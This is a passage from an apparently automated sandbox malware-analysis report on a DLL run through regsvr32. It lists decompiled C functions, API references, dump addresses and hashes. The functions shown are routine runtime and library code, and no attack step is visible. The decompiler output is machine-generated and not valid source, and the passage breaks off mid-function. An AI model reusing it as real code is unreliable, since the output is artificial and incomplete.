0x10002d9e
0x10002dab
0x00000000
0x10002db8
0x10002dc3
0x10002e0b
0x10002e17
0x10002e1a
0x10002e21
0x10002e45
0x10002e5d
0x10002e62
0x10002e67
0x10002e30
0x10002e39
0x10002e42
0x00000000
0x10002e42
0x10002e6f
0x10002e72
0x00000000
0x10002e72
0x10002e81
0x10002e8f
0x10002e98
0x00000000
0x10002eb5
0x10002e9c
0x00000000
0x10002ea2
0x10002e85
0x00000000
0x10002e8b
0x10002dd7
0x10002dfa
0x00000000
0x10002dfa
0x10002ddb
0x00000000
0x10002de1
0x10002d9e
0x10002d7f
0x00000000

APIs

SetLastError.KERNEL32(0000007F), ref: 10002D7F
SetLastError.KERNEL32(0000007F), ref: 10002DAB

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 4d3452531a7c5fa1c81c99bf09ef5018cf44bb84df21a50ba64e81c18ec72dd0
Instruction ID: 028074866867044f4bb64f701422ec5252acdb94d91fdee864382ef112f730bb
Opcode Fuzzy Hash: 4d3452531a7c5fa1c81c99bf09ef5018cf44bb84df21a50ba64e81c18ec72dd0
Instruction Fuzzy Hash: F7510570A4415AEFEF04CF94C880AAEB7F1FF48384F608569D855AB349D734EA41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 10023E83, Relevance: 6.1, APIs: 4, Instructions: 101
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10023E83(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E10016E2B( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E1001E243( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E10017D62(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0xa045ff98
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0xa045ff98
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								__eflags = _v8;
								_t27 = _t56 + 0xac; // 0xa045ff98
								_t57 =  *_t27;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x10023e8b
0x10023e92
0x10023ea7
0x00000000
0x10023e99
0x10023e9b
0x10023eb3
0x10023eb8
0x10023ebb
0x10023ebe
0x10023ee7
0x10023eec
0x10023ef0
0x10023f71
0x10023f83
0x10023f8c
0x10023f8e
0x10023ece
0x10023ece
0x10023ed1
0x10023ed3
0x10023ed6
0x10023ed6
0x10023ed6
0x10023ed6
0x00000000
0x10023edc
0x10023f50
0x10023f50
0x10023f55
0x10023f5b
0x10023f5e
0x10023f60
0x10023f63
0x10023f63
0x10023f63
0x10023f63
0x00000000
0x10023f67
0x10023ef2
0x10023ef5
0x10023ef5
0x10023efb
0x10023efe
0x10023f25
0x10023f28
0x10023f28
0x10023f2e
0x00000000
0x00000000
0x10023f30
0x10023f33
0x00000000
0x00000000
0x10023f35
0x10023f35
0x10023f38
0x10023f38
0x10023f3e
0x10023eac
0x10023eac
0x10023f47
0x00000000
0x10023f47
0x10023f00
0x10023f03
0x00000000
0x00000000
0x10023f07
0x10023f15
0x10023f18
0x10023f1e
0x10023f20
0x10023f23
0x00000000
0x00000000
0x00000000
0x10023f23
0x10023ec0
0x10023ec3
0x10023ec5
0x10023ecb
0x10023ecb
0x00000000
0x10023e9d
0x10023e9d
0x10023ea2
0x10023ea4
0x10023ea4
0x00000000
0x10023ea2
0x10023e9b

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 10023EB3
__isleadbyte_l.LIBCMT ref: 10023EE7
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000000,?,00000000,10022C1D,?,?,00000002), ref: 10023F18
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000000,?,00000000,10022C1D,?,?,00000002), ref: 10023F86

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 9fecb1cfdfc7269cf4ddeba3d560e390ad46f881d90bbc81769201c589544707
Instruction ID: bc0a73e0192d900c1d89498958e44598309ec6eeb61669affd2269eacaf1277d
Opcode Fuzzy Hash: 9fecb1cfdfc7269cf4ddeba3d560e390ad46f881d90bbc81769201c589544707
Instruction Fuzzy Hash: EA319931A0028AEFDF50DFA4E891AAE7BF9EF00251F92C5A9F4648B191D330E944DB50

Uniqueness

Uniqueness Score: -1.00%

Function 100145B9, Relevance: 6.1, APIs: 4, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E100145B9(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				signed int _t39;
				void* _t47;
				intOrPtr* _t48;
				void* _t50;
				void* _t51;
				void* _t64;
				void* _t65;
				intOrPtr _t66;
				void* _t68;
				void* _t70;

				_t65 = __edi;
				_t64 = __edx;
				_t51 = E1000D61F(_t50, __ecx, __edi, _t68, __eflags);
				_t29 =  *((intOrPtr*)(_t51 + 0x10));
				if(_t29 == 0) {
					L19:
					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
				}
				_t32 = _t29 - 1;
				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
				if(_t32 != 0) {
					goto L19;
				}
				if(_a4 == 0) {
					L8:
					_push(_t65);
					_t66 =  *((intOrPtr*)(E1000D5EC(_t51, _t65, 0, _t77) + 4));
					_t70 = E100139DB(0x10058f44);
					if(_t70 == 0 || _t66 == 0) {
						L18:
						goto L19;
					} else {
						_t35 =  *((intOrPtr*)(_t70 + 0xc));
						_t80 = _t35;
						if(_t35 == 0) {
							L12:
							if( *((intOrPtr*)(_t66 + 0x98)) != 0) {
								_t36 =  *((intOrPtr*)(_t70 + 0xc));
								_a4 = _a4 & 0x00000000;
								_t83 = _t36;
								if(_t36 != 0) {
									_push(_t36);
									_t39 = E1001A023(_t51, _t64, _t66, _t70, _t83);
									_push( *((intOrPtr*)(_t70 + 0xc)));
									_a4 = _t39;
									E10016380(_t51, _t66, _t70, _t83);
								}
								_t37 = E1001703B(_t51, _t64, _t66, _t70,  *((intOrPtr*)(_t66 + 0x98)));
								 *((intOrPtr*)(_t70 + 0xc)) = _t37;
								if(_t37 == 0 && _a4 != _t37) {
									 *((intOrPtr*)(_t70 + 0xc)) = E1001703B(_t51, _t64, _t66, _t70, _a4);
								}
							}
							goto L18;
						}
						_push(_t35);
						if(E1001A023(_t51, _t64, _t66, _t70, _t80) >=  *((intOrPtr*)(_t66 + 0x98))) {
							goto L18;
						}
						goto L12;
					}
				}
				if(_a4 != 0xffffffff) {
					_t47 = E1000B510();
					if(_t47 != 0) {
						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
						_t77 = _t48;
						if(_t48 != 0) {
							 *_t48(0, 0);
						}
					}
				}
				E100144ED( *((intOrPtr*)(_t51 + 0x20)), _t65);
				E100144ED( *((intOrPtr*)(_t51 + 0x1c)), _t65);
				E100144ED( *((intOrPtr*)(_t51 + 0x18)), _t65);
				E100144ED( *((intOrPtr*)(_t51 + 0x14)), _t65);
				E100144ED( *((intOrPtr*)(_t51 + 0x24)), _t65);
				goto L8;
			}

0x100145b9
0x100145b9
0x100145c3
0x100145c5
0x100145cc
0x100146a4
0x100146af
0x100146af
0x100145d2
0x100145d5
0x100145d8
0x00000000
0x00000000
0x100145e1
0x10014625
0x10014625
0x1001462b
0x10014638
0x1001463c
0x100146a3
0x00000000
0x10014642
0x10014642
0x10014645
0x10014647
0x10014658
0x1001465f
0x10014661
0x10014664
0x10014668
0x1001466a
0x1001466c
0x1001466d
0x10014672
0x10014675
0x10014678
0x1001467e
0x10014685
0x1001468d
0x10014690
0x100146a0
0x100146a0
0x10014690
0x00000000
0x1001465f
0x10014649
0x10014656
0x00000000
0x00000000
0x00000000
0x10014656
0x1001463c
0x100145e7
0x100145e9
0x100145f0
0x100145f2
0x100145f5
0x100145f7
0x100145fb
0x100145fb
0x100145f7
0x100145f0
0x10014600
0x10014608
0x10014610
0x10014618
0x10014620
0x00000000

APIs

__msize.LIBCMT ref: 1001464A
__msize.LIBCMT ref: 1001466D
_malloc.LIBCMT ref: 10014685
_malloc.LIBCMT ref: 1001469A

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: __msize_malloc
String ID:
API String ID: 1288803200-0
Opcode ID: f4a42d07282e480ba19c61c33f8d9b2ab7007992bfdb09378e69a2fee1890d3d
Instruction ID: c51f58ba7030090f65d8388f2f6216d6b95cef8c4540db251b535ec9dede0d79
Opcode Fuzzy Hash: f4a42d07282e480ba19c61c33f8d9b2ab7007992bfdb09378e69a2fee1890d3d
Instruction Fuzzy Hash: 2E21F375500A019FCB55DF34D881B5A73E4FF05298B22842AE869DF266DF30ECC1CB82

Uniqueness

Uniqueness Score: -1.00%

Function 10009D34, Relevance: 6.1, APIs: 4, Instructions: 58
windowCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 87%

			E10009D34(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8, char _a12) {
				intOrPtr* _v0;
				void* _v4;
				signed int _v8;
				intOrPtr _v16;
				void* _t20;
				intOrPtr* _t23;
				void* _t29;
				void* _t31;
				intOrPtr _t35;
				char _t36;
				void* _t40;
				void* _t42;
				void* _t44;

				_t44 = __eflags;
				_t38 = __esi;
				_t37 = __edi;
				_t31 = __ebx;
				_push(4);
				E10017BC1(E10027DA5, __ebx, __edi, __esi);
				_t35 = E10009B91(_t44, 0xc);
				_v16 = _t35;
				_t20 = 0;
				_v4 = 0;
				if(_t35 != 0) {
					_t20 = E10009CDE(_t35);
				}
				_t36 = _a4;
				_v8 = _v8 | 0xffffffff;
				 *((intOrPtr*)(_t20 + 8)) = _t36;
				_a4 = _t20;
				E10017C83( &_a4, 0x1002e16c);
				asm("int3");
				_t40 = _t42;
				_t23 = _v0;
				_push(_t31);
				if(_t23 != 0) {
					 *_t23 = 0;
				}
				if(FormatMessageA(0x1100, 0,  *(_t36 + 8), 0x800,  &_a12, 0, 0) != 0) {
					E10009C0D(0, _t36, _t37, _t38, _t40, _a4, _a8, _a12, 0xffffffff);
					LocalFree(_a12);
					_t29 = 1;
					__eflags = 1;
				} else {
					 *_a4 = 0;
					_t29 = 0;
				}
				return _t29;
			}

0x10009d34
0x10009d34
0x10009d34
0x10009d34
0x10009d34
0x10009d3b
0x10009d48
0x10009d4a
0x10009d4d
0x10009d51
0x10009d54
0x10009d56
0x10009d56
0x10009d5b
0x10009d5e
0x10009d62
0x10009d65
0x10009d71
0x10009d76
0x10009d78
0x10009d7a
0x10009d7d
0x10009d82
0x10009d84
0x10009d84
0x10009da2
0x10009db8
0x10009dc3
0x10009dcb
0x10009dcb
0x10009da4
0x10009da7
0x10009da9
0x10009da9
0x10009dce

APIs

__EH_prolog3.LIBCMT ref: 10009D3B

Part of subcall function 10009B91: _malloc.LIBCMT ref: 10009BAB

__CxxThrowException@8.LIBCMT ref: 10009D71
FormatMessageA.KERNEL32(00001100,00000000,8007000E,00000800,?,00000000,00000000,?,?,8007000E,1002E16C,00000004,1000105C,8007000E), ref: 10009D9A

Part of subcall function 10009C0D: _wctomb_s.LIBCMT ref: 10009C1D

LocalFree.KERNEL32(?), ref: 10009DC3

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
String ID:
API String ID: 1615547351-0
Opcode ID: e381bce633557ad048b1696ea26053178c542294b2cd97fac3bd263aaafec7a1
Instruction ID: 2087144037a306e6c8b96e697859ee983d4da7c50e84c085b7e4f49f0a09e647
Opcode Fuzzy Hash: e381bce633557ad048b1696ea26053178c542294b2cd97fac3bd263aaafec7a1
Instruction Fuzzy Hash: 1E1170B1644249AFEB00DFA4DC81DAE3BA9FB04390F21452AF629CA1D1D731D9508B51

Uniqueness

Uniqueness Score: -1.00%

Function 1000C887, Relevance: 6.1, APIs: 4, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E1000C887(void* __ecx) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t23;
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t32;
				signed int _t34;
				signed short _t35;
				void* _t37;
				signed short* _t40;

				_push(__ecx);
				_push(_t28);
				_t37 = __ecx;
				_t42 =  *((intOrPtr*)(__ecx + 0x58));
				_t40 =  *(__ecx + 0x60);
				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
					_t32 =  *(E1000D5EC(_t28, __ecx, _t40, _t42) + 0xc);
					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t37 + 0x58), 5));
				}
				if(_v8 != 0) {
					_t40 = LockResource(_v8);
				}
				_t30 = 1;
				if(_t40 != 0) {
					_t35 =  *_t40;
					if(_t40[1] != 0xffff) {
						_t23 = _t40[5] & 0x0000ffff;
						_t34 = _t40[6] & 0x0000ffff;
					} else {
						_t35 = _t40[6];
						_t23 = _t40[9] & 0x0000ffff;
						_t34 = _t40[0xa] & 0x0000ffff;
					}
					if((_t35 & 0x00001801) != 0 || _t23 != 0 || _t34 != 0) {
						_t30 = 0;
					}
				}
				if( *(_t37 + 0x58) != 0) {
					FreeResource(_v8);
				}
				return _t30;
			}

0x1000c88a
0x1000c88b
0x1000c88e
0x1000c890
0x1000c897
0x1000c89a
0x1000c89d
0x1000c8a4
0x1000c8bb
0x1000c8bb
0x1000c8c2
0x1000c8cd
0x1000c8cd
0x1000c8d1
0x1000c8d4
0x1000c8dc
0x1000c8de
0x1000c8ed
0x1000c8f1
0x1000c8e0
0x1000c8e0
0x1000c8e3
0x1000c8e7
0x1000c8e7
0x1000c8fa
0x1000c906
0x1000c906
0x1000c8fa
0x1000c90c
0x1000c911
0x1000c911
0x1000c91d

APIs

FindResourceA.KERNEL32(?,00000000,00000005), ref: 1000C8AD
LoadResource.KERNEL32(?,00000000), ref: 1000C8B5
LockResource.KERNEL32(00000000), ref: 1000C8C7
FreeResource.KERNEL32(00000000), ref: 1000C911

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: ba0e54e7ba739e7dbb3db6c45d0c9dd504ce55cc39771a4365ee787ff2243026
Instruction ID: fb1a28c5f31200e3abd4209bdb6f3add133a5505808a0a6cde1b54a47ab738f1
Opcode Fuzzy Hash: ba0e54e7ba739e7dbb3db6c45d0c9dd504ce55cc39771a4365ee787ff2243026
Instruction Fuzzy Hash: 46118F3150076AEFE710DF95C889AAAB3F5FF003D5F218029E84252594D770ED50D760

Uniqueness

Uniqueness Score: -1.00%

Function 1000ADB5, Relevance: 6.1, APIs: 4, Instructions: 56
threadCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E1000ADB5(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t37;
				intOrPtr _t43;
				void* _t45;
				intOrPtr* _t51;
				void* _t52;
				void* _t53;

				_t53 = __eflags;
				_t46 = __ecx;
				_t44 = __ebx;
				_push(4);
				E10017BC1(E10027E86, __ebx, __edi, __esi);
				_t51 = __ecx;
				 *((intOrPtr*)(_t52 - 0x10)) = __ecx;
				E1000B862(__ebx, __ecx, __edi, __ecx, _t53);
				_t54 =  *((intOrPtr*)(_t52 + 8));
				 *((intOrPtr*)(_t52 - 4)) = 0;
				 *_t51 = 0x10029f54;
				if( *((intOrPtr*)(_t52 + 8)) == 0) {
					 *((intOrPtr*)(_t51 + 0x50)) = 0;
				} else {
					_t43 = E1001817A( *((intOrPtr*)(_t52 + 8)));
					_pop(_t46);
					 *((intOrPtr*)(_t51 + 0x50)) = _t43;
				}
				_t45 = E1000D5EC(_t44, 0, _t51, _t54);
				_t55 = _t45;
				if(_t45 == 0) {
					L4:
					E1000A0DB(_t45, _t46, 0, _t51, _t55);
				}
				_t7 = _t45 + 0x74; // 0x74
				_t46 = _t7;
				_t37 = E1000AA21(_t45, _t7, 0, _t51, _t55);
				if(_t37 == 0) {
					goto L4;
				}
				 *((intOrPtr*)(_t37 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x2c)) = GetCurrentThread();
				 *((intOrPtr*)(_t51 + 0x30)) = GetCurrentThreadId();
				 *((intOrPtr*)(_t45 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x44)) = 0;
				 *((intOrPtr*)(_t51 + 0x7c)) = 0;
				 *((intOrPtr*)(_t51 + 0x64)) = 0;
				 *((intOrPtr*)(_t51 + 0x68)) = 0;
				 *((intOrPtr*)(_t51 + 0x54)) = 0;
				 *((intOrPtr*)(_t51 + 0x60)) = 0;
				 *((intOrPtr*)(_t51 + 0x88)) = 0;
				 *((intOrPtr*)(_t51 + 0x58)) = 0;
				 *((short*)(_t51 + 0x92)) = 0;
				 *((short*)(_t51 + 0x90)) = 0;
				 *((intOrPtr*)(_t51 + 0x48)) = 0;
				 *((intOrPtr*)(_t51 + 0x8c)) = 0;
				 *((intOrPtr*)(_t51 + 0x80)) = 0;
				 *((intOrPtr*)(_t51 + 0x84)) = 0;
				 *((intOrPtr*)(_t51 + 0x70)) = 0;
				 *((intOrPtr*)(_t51 + 0x74)) = 0;
				 *((intOrPtr*)(_t51 + 0x94)) = 0;
				 *((intOrPtr*)(_t51 + 0x9c)) = 0;
				 *((intOrPtr*)(_t51 + 0x5c)) = 0;
				 *((intOrPtr*)(_t51 + 0x6c)) = 0;
				 *((intOrPtr*)(_t51 + 0x98)) = 0x200;
				return E10017C60(_t51);
			}

0x1000adb5
0x1000adb5
0x1000adb5
0x1000adb5
0x1000adbc
0x1000adc1
0x1000adc3
0x1000adc6
0x1000adcd
0x1000add0
0x1000add3
0x1000add9
0x1000ade9
0x1000addb
0x1000adde
0x1000ade3
0x1000ade4
0x1000ade4
0x1000adf1
0x1000adf3
0x1000adf5
0x1000adf7
0x1000adf7
0x1000adf7
0x1000adfc
0x1000adfc
0x1000adff
0x1000ae06
0x00000000
0x00000000
0x1000ae08
0x1000ae11
0x1000ae1a
0x1000ae1d
0x1000ae20
0x1000ae23
0x1000ae26
0x1000ae29
0x1000ae2c
0x1000ae2f
0x1000ae32
0x1000ae38
0x1000ae3b
0x1000ae42
0x1000ae49
0x1000ae4c
0x1000ae52
0x1000ae58
0x1000ae5e
0x1000ae61
0x1000ae64
0x1000ae6a
0x1000ae70
0x1000ae73
0x1000ae76
0x1000ae87

APIs

__EH_prolog3.LIBCMT ref: 1000ADBC

Part of subcall function 1000B862: __EH_prolog3.LIBCMT ref: 1000B869

__strdup.LIBCMT ref: 1000ADDE
GetCurrentThread.KERNEL32 ref: 1000AE0B
GetCurrentThreadId.KERNEL32 ref: 1000AE14

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrentH_prolog3Thread$__strdup
String ID:
API String ID: 4206445780-0
Opcode ID: 9c26e9d60202904c8b3007aba5d4454f2b931d5449d83442688f904a073da271
Instruction ID: f8307bcc4145d2f3034cc24c4785684ef343d47fe4738e0b5029f7ba663f9659
Opcode Fuzzy Hash: 9c26e9d60202904c8b3007aba5d4454f2b931d5449d83442688f904a073da271
Instruction Fuzzy Hash: 88217EB4800B50CFE721DF6A858564AFBF8FFA4680F10891FD59A87A25CBB0A581CF45

Uniqueness

Uniqueness Score: -1.00%

Function 1001170E, Relevance: 6.1, APIs: 4, Instructions: 55
windowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E1001170E(intOrPtr* __ecx) {
				char _v20;
				intOrPtr _v32;
				void* __ebx;
				void* __edi;
				intOrPtr* __esi;
				struct HWND__* _t18;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t33;

				_t28 = __ecx;
				_push(0);
				_t33 = __ecx;
				if( *((intOrPtr*)( *__ecx + 0x120))() != 0) {
					__eax =  *__esi;
					__ecx = __esi;
					__eax =  *((intOrPtr*)( *__esi + 0x170))();
				}
				_t30 = SendMessageA;
				SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
				E1001044A(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
				_t28 = _t33;
				_t33 = E10010DEC(0, _t28, SendMessageA);
				if(_t33 != 0) {
					SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
					E1001044A(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
					_t18 = GetCapture();
					if(_t18 != 0) {
						_t18 = SendMessageA(_t18, 0x1f, 0, 0);
					}
					return _t18;
				} else {
					_push(_t28);
					_v20 = 0x10057298;
					E10017C83( &_v20, 0x1002e2fc);
					asm("int3");
					_push(4);
					E10017BC1(E10027DEC, 0, SendMessageA, _t33);
					_t29 = E10013965(0x104);
					_v32 = _t29;
					_t24 = 0;
					_v20 = 0;
					if(_t29 != 0) {
						_t24 = E1000CF71(_t29);
					}
					return E10017C60(_t24);
				}
			}

0x1001170e
0x1001170e
0x10011710
0x1001171d
0x1001171f
0x10011721
0x10011723
0x10011723
0x10011729
0x10011738
0x10011745
0x1001174a
0x10011751
0x10011755
0x10011763
0x10011770
0x10011775
0x1001177d
0x10011784
0x10011784
0x10011789
0x10011757
0x1000a0de
0x1000a0e8
0x1000a0ef
0x1000a0f4
0x1000a0f5
0x1000a0fc
0x1000a10b
0x1000a10d
0x1000a110
0x1000a114
0x1000a117
0x1000a119
0x1000a119
0x1000a123
0x1000a123

APIs

SendMessageA.USER32 ref: 10011738
SendMessageA.USER32 ref: 10011763

Part of subcall function 1001044A: GetTopWindow.USER32(00000000), ref: 10010458

GetCapture.USER32 ref: 10011775
SendMessageA.USER32 ref: 10011784

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$CaptureWindow
String ID:
API String ID: 729421689-0
Opcode ID: 80fe9e985e59ca35730d0e4f98e874e27816f3184ada4d3ba37fa42bed1d0644
Instruction ID: c1fa24ad5068faa30316ff7830c17e6e1fa791912a80157e4ea929c0746033bf
Opcode Fuzzy Hash: 80fe9e985e59ca35730d0e4f98e874e27816f3184ada4d3ba37fa42bed1d0644
Instruction Fuzzy Hash: EF012CB5350219BFF621AB608CC9FBA36ADEB487C4F010539F685AA1E2C6A19C415660

Uniqueness

Uniqueness Score: -1.00%

Function 10013F17, Relevance: 6.1, APIs: 4, Instructions: 55
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E10013F17(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
				signed int _v8;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				CHAR* _t21;
				char* _t24;
				intOrPtr _t28;
				void* _t30;
				signed int _t31;

				_t28 = __edx;
				_t13 =  *0x10057a08; // 0x7d1a16f8
				_v8 = _t13 ^ _t31;
				_t24 = _a8;
				_t30 = __ecx;
				_t29 = _a4;
